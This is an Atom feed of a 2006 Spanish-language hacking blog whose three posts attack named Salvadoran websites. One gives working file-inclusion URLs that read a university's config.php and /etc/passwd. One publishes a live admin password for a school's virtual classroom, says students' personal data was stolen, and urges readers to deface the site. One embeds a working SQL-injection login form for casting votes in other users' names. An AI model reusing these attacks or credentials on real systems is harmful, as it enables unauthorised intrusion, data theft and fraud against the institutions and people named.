<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-33801008</id><updated>2011-09-06T05:06:54.076-06:00</updated><title type='text'>hackeando el salvador</title><subtitle type='html'>Blog dedicado a la publicacion de bug de paginas salvadoreñas.
creado por hackersalvatrucho@gmail.com</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://hackeandoelsalvador.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/33801008/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://hackeandoelsalvador.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>hackersalvatrucho</name><uri>http://www.blogger.com/profile/06244597501616764977</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>3</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-33801008.post-115781721287534388</id><published>2006-09-09T09:37:00.000-06:00</published><updated>2006-09-09T10:16:42.690-06:00</updated><title type='text'>hackeando la UFG(Universidad Francisco Gavidia)</title><content type='html'>Bueno le llego el turno a la Universidad &lt;span style="font-weight: bold;"&gt;gavidia&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;el bug que les presento nos servira para &lt;span style="font-weight: bold;"&gt;ver el codigo fuente&lt;/span&gt; de cualquier archivo del servidor de principal donde esta alojado el sitio web, vamos a ver el codigo fuente de los archivos de configuracion, los usuarios y password que ocupan para conectarse a la base de datos  y usuarios y password del sistema operativo.&lt;br /&gt;&lt;br /&gt;el bug se basa en la mala validacion de los parametros que reciben el bug lo econtre en la pagina index.php :&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ufg.edu.sv/ufg/index.php?module=Gateway&amp;type=user&amp;amp;func=view&amp;url=http://www.ufg.edu.sv/ufg/institucional/vision.html&amp;amp;jseid=1&amp;jitemID=4"    target=_blank&gt;http://www.ufg.edu.sv/ufg/index.php? module=Gateway&amp;amp;type=user &amp;func=view&amp;amp;url=http://www.ufg.edu.sv/ufg/institucional/vision.html &amp;jseid=1&amp;amp;jitemID=4&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;en donde ocupan una variable llamada URL el cual como se ve en el link anterior llama a otra pagina y la despliega dentro index.php.&lt;br /&gt;&lt;br /&gt;lo que hice primero es ver si puede ejecutar codigo atravez del bug RFI, pero no sirvio asi que lo que hice fue cambiar la ruta del archivo que llama por uno que este en el servidor local asi:&lt;br /&gt;&lt;br /&gt;url=http://... etc.&lt;br /&gt;&lt;br /&gt;y lo cambie por un archivo que este localmente y como ellos ocupan PostNuke  tiene que existir un archivo config.php donde esta la configuracion del portal osea el usuario el password de la base de datos.&lt;br /&gt;&lt;br /&gt;url=config.php&lt;br /&gt;&lt;br /&gt;el link completo queda asi:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ufg.edu.sv/ufg/index.php?module=Gateway&amp;type=user&amp;amp;func=view&amp;url=config.php" target=_blank&gt;http://www.ufg.edu.sv/ufg/index.php? module=Gateway&amp;amp;type=user&amp;func=view&amp;amp;url=config.php&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;cuando den click en el siguiente link veran que no aparece nada pero al ver el codigo fuente de la pagina mostrada podemos ver algo asi:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://hackersalvatrucho.googlepages.com/configdelaufg.gif" target=_blank&gt;http://hackersalvatrucho.googlepages.com/configdelaufg.gif&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;ahora que ya vimos el archivo de configuracion podemos ver otras cosas interesantes como los usuarios del sistema operativo&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ufg.edu.sv/ufg/index.php?module=Gateway&amp;type=user&amp;amp;func=view&amp;url=/etc/passwd" target=_blank&gt;http://www.ufg.edu.sv/ufg/index.php? module=Gateway&amp;amp;type=user&amp;func=view&amp;amp;url=/etc/passwd&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;ahora ya saben como ver cualquier archivo del servidor solo necesitan variar el parametro url y listo ;-)&lt;br /&gt;&lt;br /&gt;si saben un poco de linux sabran que hay mas archivos interesantes que ver.&lt;br /&gt;&lt;br /&gt;experen otros bug proximamente......&lt;br /&gt;&lt;br /&gt;les gusto esto?? esperen mas bug proximamente.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/33801008-115781721287534388?l=hackeandoelsalvador.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackeandoelsalvador.blogspot.com/feeds/115781721287534388/comments/default' title='Comentarios de la entrada'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=33801008&amp;postID=115781721287534388' title='24 Comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/33801008/posts/default/115781721287534388'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/33801008/posts/default/115781721287534388'/><link rel='alternate' type='text/html' href='http://hackeandoelsalvador.blogspot.com/2006/09/hackeando-la-ufguniversidad-francisco.html' title='hackeando la UFG(Universidad Francisco Gavidia)'/><author><name>hackersalvatrucho</name><uri>http://www.blogger.com/profile/06244597501616764977</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>24</thr:total></entry><entry><id>tag:blogger.com,1999:blog-33801008.post-115734222027572472</id><published>2006-09-03T21:46:00.000-06:00</published><updated>2006-09-06T21:30:54.036-06:00</updated><title type='text'>hackeando al ITCA</title><content type='html'>Para los que quieran curiosiar, modificar o hacer lo que quieran con la pagina del ITCA les dejo el usuario y el password de el aula virtual del ITCA.&lt;br /&gt;&lt;br /&gt;usuario:admin&lt;br /&gt;Password: SisTem15VT07&lt;br /&gt;&lt;br /&gt;se preguntaran como lo obtube?? pues entre hace un tiempo con un bug RFI del aula virtual que ellos ocupan y subi un programa que me ayudo a ver todas las bases de datos que ellos tiene en ese server y busque los datos que les estoy mostrando.&lt;br /&gt;&lt;br /&gt;tambien obtube todas las notas, direcciones, email, y otros datos personales de los alumnos del ITCA que algun dia voy a publicar.&lt;br /&gt;&lt;br /&gt;ocupen esta info con sabiduria y no cambien el password para que varios podamos usarlo.&lt;br /&gt;&lt;br /&gt;DIVIERTANSE MUCHO.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;el usuario y password es para usarlo aqui:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a style="font-weight: bold;" href="http://virtual.itca.edu.sv/"&gt;http://virtual.itca.edu.sv/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;PD: si la hackean publiquenla en zone-h en el siguente link:&lt;br /&gt;&lt;a href="http://www.zone-h.org/component/option,com_notify/Itemid,89/"&gt;http://www.zone-h.org/component/option,com_notify/Itemid,89/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;tengo otros bug de universidades que los publicare tambien.&lt;br /&gt;esperenlos...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/33801008-115734222027572472?l=hackeandoelsalvador.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackeandoelsalvador.blogspot.com/feeds/115734222027572472/comments/default' title='Comentarios de la entrada'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=33801008&amp;postID=115734222027572472' title='6 Comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/33801008/posts/default/115734222027572472'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/33801008/posts/default/115734222027572472'/><link rel='alternate' type='text/html' href='http://hackeandoelsalvador.blogspot.com/2006/09/hackeando-al-itca.html' title='hackeando al ITCA'/><author><name>hackersalvatrucho</name><uri>http://www.blogger.com/profile/06244597501616764977</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-33801008.post-115730176038107581</id><published>2006-09-03T10:42:00.000-06:00</published><updated>2006-09-06T09:09:56.926-06:00</updated><title type='text'>Arroba de Oro</title><content type='html'>&lt;form id="form1" name="form1" method="post" action="http://www.arrobadeoro.com/2006/sv/votar.asp"&gt;&lt;br /&gt;La arroba de oro es un portal creado para premiar las mejores paginas de centroamerica.&lt;br /&gt;&lt;br /&gt;Visitando el portal de la Arroba de Oro encontre un &lt;span style="font-weight: bold;"&gt;bug&lt;/span&gt; en la pagina de login por lo que  he creado un formulario con html y javascript para facilitar los votos &lt;b&gt;sin necesidad de conocer la contraseña&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;pensando que hacer con esta informacion decidi poner este blog donde publicare los bug de las paginas salvadoreñas(he econtrado otras muy interesantes que despues publicare)&lt;br /&gt;&lt;br /&gt;Si quieres votar a nombre de otra persona registrada en la arroba de oro, solo tenes que introducir un &lt;b&gt;correo o parte de el&lt;/b&gt; y precionar el boton y entraras a la arroba de oro.&lt;br /&gt;&lt;br /&gt;  Ingresa un email o parte de el: &lt;input type="text" name="nCorreo" id="nCorreo" size="26" maxlength="50"&gt;&lt;br /&gt;  &lt;input  onmouseover="txtc=document.getElementById('nCorreo');txtp=document.getElementById('Password');txtp.value='';txtp.value='\' or correo like \'%'+txtc.value+'%\' --';" type="submit" name="Submit" value="Votar Gratis" /&gt;&lt;br /&gt;  &lt;input type="hidden" name="Correo" id="Correo" value="elsalvador@elsalvador.com" size="26" &gt;&lt;br /&gt;  &lt;input type="hidden" name="Password" id="Password" value=""  &gt;&lt;br /&gt;  &lt;input type="hidden" name="LogIn" id="LogIn" value=1&gt;&lt;br /&gt;Ya pensaste en el dinero que esta en juego en esto????. inmagina un programa mas elaborado que vote automaticamente, mmmmmmm.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Si te ha gustado esta pagina dejame un comentario.&lt;br /&gt;&lt;/form&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/33801008-115730176038107581?l=hackeandoelsalvador.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackeandoelsalvador.blogspot.com/feeds/115730176038107581/comments/default' title='Comentarios de la entrada'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=33801008&amp;postID=115730176038107581' title='29 Comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/33801008/posts/default/115730176038107581'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/33801008/posts/default/115730176038107581'/><link rel='alternate' type='text/html' href='http://hackeandoelsalvador.blogspot.com/2006/09/arroba-de-oro.html' title='Arroba de Oro'/><author><name>hackersalvatrucho</name><uri>http://www.blogger.com/profile/06244597501616764977</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>29</thr:total></entry></feed>
